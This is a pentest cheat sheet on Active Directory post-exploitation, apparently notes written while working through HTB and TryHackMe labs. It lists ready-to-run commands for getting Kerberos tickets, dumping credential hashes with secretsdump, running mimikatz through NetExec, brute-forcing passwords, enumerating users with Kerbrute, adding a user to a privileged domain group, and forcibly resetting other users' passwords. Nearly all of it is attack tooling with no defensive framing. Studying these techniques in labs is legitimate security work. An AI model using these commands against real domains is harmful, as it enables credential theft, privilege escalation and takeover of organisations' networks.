Post Exploitation
Impacket
To get TGT (Ticket Granting Ticket with impacket):
getTGT.py domain.htb/userTo dump hashes:
secretsdump.py htb.local/aditya:aditya@<ip>Bloodhound
To use TGT with bloodhound
KRB5CCNAME=user.ccache ./bloodhound.py -k -dc dc.domain.htb -ns <ip> -c All -d domain.htb -u user@domain.htbNetExec
mimikatz module:
nxc smb <ip> -u 'Administrator' -p 'PASS' --local-auth -M mimikatznxc smb <ip> -u 'Administrator' -p 'PASS' -M mimikatznxc smb <ip> -u Administrator -p 'PASS' -M mimikatz -o COMMAND='privilege::debug'Password Bruteforce:
nsc smb <ip> -u userlist.out -p passlist.txt Kerbrute
To check if users exist and then get their hashes:
kerbrute userenum --dc dc.domain.htb -d domain.htb username.txtEnumeration
To check domain details
net user /domainTo check group details
net group /domainTo add new user to domain:
net user aditya aditya123@ /add /domainTo add user to a group:
net group "Exchange Windows Permissions" /add adityaTo check users in the group:
net group "Tier 1 Admins" /domainTo check password policy, lockout policy, etc:
net accounts /domainTo reset other user's password if permission present use:
Set-ADAccountPassword name -Reset -NewPassword (Read-Host -AsSecureString -Prompt 'New Password') -Verbose
New Password: *********If username already present in format of : then:
runas.exe /netonly /user:<domain>\<username> cmd.exePowershell:
Get-ADUser -Identity mr.robot -Server evilcorp.com -Properties *Get-ADUser -Filter 'Name -like "*stevens"' -Server za.tryhackme.com | Format-Table Name,SamAccountName -AFor groups:
Get-ADGroup -Identity Administrators -Server za.tryhackme.comGet-ADGroupMember -Identity Administrators -Server za.tryhackme.comFor domains:
Get-ADDomain -Server za.tryhackme.comChange Password:
Set-ADAccountPassword -Identity gordon.stevens -Server za.tryhackme.com -OldPassword (ConvertTo-SecureString -AsPlaintext "old" -force) -NewPassword (ConvertTo-SecureString -AsPlainText "new" -Force)Last updated
Was this helpful?